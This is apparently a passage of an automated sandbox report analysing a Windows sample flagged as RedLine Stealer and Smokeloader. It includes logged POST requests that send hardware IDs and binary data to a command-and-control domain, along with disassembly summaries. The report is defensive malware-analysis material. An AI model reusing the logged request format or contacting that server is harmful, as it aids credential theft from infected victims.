form-data; name="hwid"6D135015ECAF0672D0632DF0E28DC412--6CP9VWM5QP1IM68YURContent-Disposition: form-data; name="pid"2--6CP9VWM5QP1IM68YURContent-Disposition: form-data; name="lid"4h5VfH----6
2025-01-09 07:43:38 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:43:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5ec4uc9m86eqlvt5hr0et8vlrj; expires=Mon, 05 May 2025 01:30:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UO8klG%2BXoft2SUBXANcGb56RzYSaCGn9Gt5TMf4tfWcTbhAyI0bztkvYJPFasVqnifHzX2PzhvZ8s5sMUcpI0CUxpCZVqU%2FeQXR84DgNaZdID24%2F%2BIw9aAC6dji2K64Ltv72ACU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2cc2719474363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1545&rtt_var=592&sent=10&recv=18&lost=0&retrans=0&sent_bytes=3057&recv_bytes=13783&delivery_rate=2746081&cwnd=241&unsent_bytes=0&cid=cb42fadd87d6b723&ts=583&x=0"
2025-01-09 07:43:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:43:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49709	104.21.96.1	443	2960	C:\Users\user\Desktop\uU6IvUPN39.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:43:39 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PL5DDJ64YC5FJAOGW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15064 Host: skidjazzyric.click
2025-01-09 07:43:39 UTC	15064	OUT	Data Raw: 2d 2d 50 4c 35 44 44 4a 36 34 59 43 35 46 4a 41 4f 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 31 33 35 30 31 35 45 43 41 46 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 50 4c 35 44 44 4a 36 34 59 43 35 46 4a 41 4f 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4c 35 44 44 4a 36 34 59 43 35 46 4a 41 4f 47 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 50 4c 35 44 Data Ascii: --PL5DDJ64YC5FJAOGWContent-Disposition: form-data; name="hwid"6D135015ECAF0672D0632DF0E28DC412--PL5DDJ64YC5FJAOGWContent-Disposition: form-data; name="pid"2--PL5DDJ64YC5FJAOGWContent-Disposition: form-data; name="lid"4h5VfH----PL5D
2025-01-09 07:43:39 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:43:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=np9ok5feu6n1nve72be9kpuofb; expires=Mon, 05 May 2025 01:30:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFDN8QONok7dnznHCZcR1CCa3O%2BVQtOxgMqanGvdoWiXCD%2FqO1AZm6787cR00Td3RkzTrb%2BeEXWo6qsDCITPzkyD771iyq36AF0I07ai0KxZPD%2FoTxH5pqfrKCTDEiwHXS1fLh8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2cc303f0f4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1570&rtt_var=596&sent=16&recv=21&lost=0&retrans=0&sent_bytes=3058&recv_bytes=16005&delivery_rate=2739212&cwnd=241&unsent_bytes=0&cid=33e0a0e70dfb8e9c&ts=797&x=0"
2025-01-09 07:43:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:43:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49710	104.21.96.1	443	2960	C:\Users\user\Desktop\uU6IvUPN39.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:43:40 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=R4D3TTVIKNLEDKWYQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20231 Host: skidjazzyric.click
2025-01-09 07:43:40 UTC	15331	OUT	Data Raw: 2d 2d 52 34 44 33 54 54 56 49 4b 4e 4c 45 44 4b 57 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 31 33 35 30 31 35 45 43 41 46 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 52 34 44 33 54 54 56 49 4b 4e 4c 45 44 4b 57 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 34 44 33 54 54 56 49 4b 4e 4c 45 44 4b 57 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 52 34 44 33 Data Ascii: --R4D3TTVIKNLEDKWYQContent-Disposition: form-data; name="hwid"6D135015ECAF0672D0632DF0E28DC412--R4D3TTVIKNLEDKWYQContent-Disposition: form-data; name="pid"3--R4D3TTVIKNLEDKWYQContent-Disposition: form-data; name="lid"4h5VfH----R4D3
2025-01-09 07:43:40 UTC	4900	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2025-01-09 07:43:41 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:43:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ihqo9nfnn5ca34mkhbqil55jb5; expires=Mon, 05 May 2025 01:30:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tIIHGLIUU%2FUAtXQtek4U5CDCnk4l0RRxeFepBBD01MBJpiP4J9KzTgLUr%2FLlNbCj5Dlyo2SQE2vRTMsoJL461MeqD5umHrA5AFhpFJzI%2BnEjYy9J8f%2FWSwh7OdPSteErhGLLd5o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2cc37ffa072a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1949&rtt_var=748&sent=12&recv=25&lost=0&retrans=0&sent_bytes=3056&recv_bytes=21194&delivery_rate=2169390&cwnd=213&unsent_bytes=0&cid=39e7461dc23e3947&ts=640&x=0"
2025-01-09 07:43:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:43:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:43:31
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\uU6IvUPN39.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\uU6IvUPN39.exe"
Imagebase:	0x400000
File size:	450'560 bytes
MD5 hash:	A478B8943EF3239752D731E7290C4A3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:43:40
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820
Imagebase:	0xc10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	20%
Signature Coverage:	56.1%
Total number of Nodes:	155
Total number of Limit Nodes:	12

Executed Functions

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
VariantInit.OLEAUT32(?), ref: 0043BF3E
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243

Strings

k"@ , xrefs: 0043BE3A
#~|, xrefs: 0043B89D
F*R(, xrefs: 0043BE2A
M, xrefs: 0043BB5B
96, xrefs: 0043BE52
[&h$, xrefs: 0043BE32
n:T8, xrefs: 0043BE4A
e?^, xrefs: 0043BC4F
#~|, xrefs: 0043B8A7
:;$%, xrefs: 0043C2EC

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 1810270423-2807872674
Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96

Function 00415720 Relevance: 17.5, APIs: 1, Strings: 8, Instructions: 1798COMMON

Download Yara Rule

Strings

a, xrefs: 004163D3
BYQZ, xrefs: 00416286
DASS, xrefs: 0041629C
F2}0, xrefs: 00415A76
NR@:, xrefs: 00416291
R(RW, xrefs: 00416265
9?4<, xrefs: 00416345
L, xrefs: 004162B2

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
API String ID: 0-3642574725
Opcode ID: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
Opcode Fuzzy Hash: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088A4
GetCurrentThreadId.KERNEL32 ref: 004088AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
GetForegroundWindow.USER32 ref: 0040896A
ExitProcess.KERNEL32 ref: 00408AB7

Strings

6W01, xrefs: 004089B5

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

defgau`c, xrefs: 00421FCA
au`c, xrefs: 00421FC6
(ijkdefgau`c, xrefs: 00421FBE

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: (ijkdefgau`c$au`c$defgau`c
API String ID: 0-3415814675
Opcode ID: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
Instruction ID: e077c08026441789f2384525beb931856e433a8fb10ce9bf48ff95afe867dbef
Opcode Fuzzy Hash: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
Instruction Fuzzy Hash: E8D10FB16083509FC714DF28C891B6BBBE1EFC5318F18892DE9858B391E7B9D805CB56

Function 006AAF5E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006AAF86
Module32First.KERNEL32(00000000,00000224), ref: 006AAFA6

Memory Dump Source

Source File: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6aa000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 44fd2278450d32040d7e95693d220271910dedb56c272edd240866ca08a12ef4
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D0F0C2312003106FD7203AF9998CBAEB2E9AF4A325F10022AE642911C0CB70EC45CE62

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MO, xrefs: 0040AA37
MO, xrefs: 0040A9CF

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040CFEC Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

6D135015ECAF0672D0632DF0E28DC412, xrefs: 0040D16B

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 6D135015ECAF0672D0632DF0E28DC412
API String ID: 0-2874345145
Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction ID: 6f13f5d4f3e8c77ab841d9a888d2aead65439f765ee3ddc41d93c1b162d9100a
Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction Fuzzy Hash: 5B516A726057008FD329CF38CC92B577BA3AFD6314B1D866DC4964B796EB39A406C744

Function 0213003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0213024D

Strings

cess, xrefs: 0213018D
kernel32.dll, xrefs: 0213008F, 02130095

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4d62c31e7b113053c7fec1a81403a43082a4b2b429e0d1c2d19d79fb67bed87b
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F527975A01229DFDB65CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA85CF14

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

Function 02130E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02130223,?,?), ref: 02130E19
SetErrorMode.KERNELBASE(00000000,?,?,02130223,?,?), ref: 02130E1E

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 141337286ceb6be3880347a732b0624d5417ee66cd2ec71782f629bcf62dde42
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 7DD0123124512877D7013A94DC09BCD7B5CDF09B66F108021FB0DD9080C770954046E5

Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
Opcode Fuzzy Hash: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 0040AB46

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004404BF

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
